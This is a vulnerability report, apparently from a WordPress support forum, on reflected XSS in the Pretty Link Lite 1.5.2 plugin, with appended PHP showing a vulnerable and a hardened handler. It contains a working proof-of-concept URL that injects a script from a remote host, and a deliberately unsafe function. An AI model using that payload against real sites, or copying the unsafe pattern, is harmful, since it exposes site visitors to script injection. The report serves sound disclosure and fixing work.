[Plugin: Pretty Link Lite] 1.5.2 XSS vulnerability
There is a report of an XSS vulnerability in this WordPress plugin: https://seclists.org/bugtraq/2011/Dec/26 which I have now tested and it seems to be valid:
wp-content/plugins/pretty-link/pretty-bar.php?url=”><SCRIPT SRC=https://ha.ckers.org/xss.js></SCRIPT>
If this PHP file is not meant to be called and executed by users, one should add a prohibitive line to the PHP file. There are plenty of examples in other modules, or I can give you one. If this is, please ensure proper user input validation.
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

I tested with WordPress version 3.2.1 and plugin version 1.5.2. Please contact me if you need any help!
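As an added illustration (not Pretty Link's own source, which is not quoted in this thread), the two fixes the report suggests in WordPress plugin terms: a guard against direct invocation of the file, and validation plus escaping of the `url` parameter before it is reflected into the page. The file name and parameter name come from the report; the markup the file emits is assumed.

```php
<?php
// Added example, not the plugin's code: a minimal stand-in for a file such as
// pretty-bar.php that reflects a ?url= query parameter into its output.

// Fix 1: refuse direct execution. ABSPATH is defined only when WordPress
// itself loaded this file; a request straight to the .php path exits here.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Vulnerable pattern (the behaviour the report describes): the raw query
// value is written into an attribute, so a closing quote breaks out of it.
function pretty_bar_vulnerable_link() {
    $url = isset( $_GET['url'] ) ? $_GET['url'] : '';
    return '<a href="' . $url . '">Open link</a>';
}

// Hardened pattern: validate the value as an http(s) URL, then escape it for
// the context it is rendered in, using WordPress's own helpers
// (esc_url_raw for storage/validation, esc_url for attributes, esc_html for text).
function pretty_bar_safe_link() {
    $raw = isset( $_GET['url'] ) ? $_GET['url'] : '';

    // esc_url_raw() returns '' for disallowed schemes (e.g. javascript:),
    // so anything that is not a plain http(s) URL is rejected outright.
    $url = esc_url_raw( $raw, array( 'http', 'https' ) );
    if ( '' === $url ) {
        return '';
    }

    return '<a href="' . esc_url( $url ) . '">' . esc_html( $url ) . '</a>';
}
```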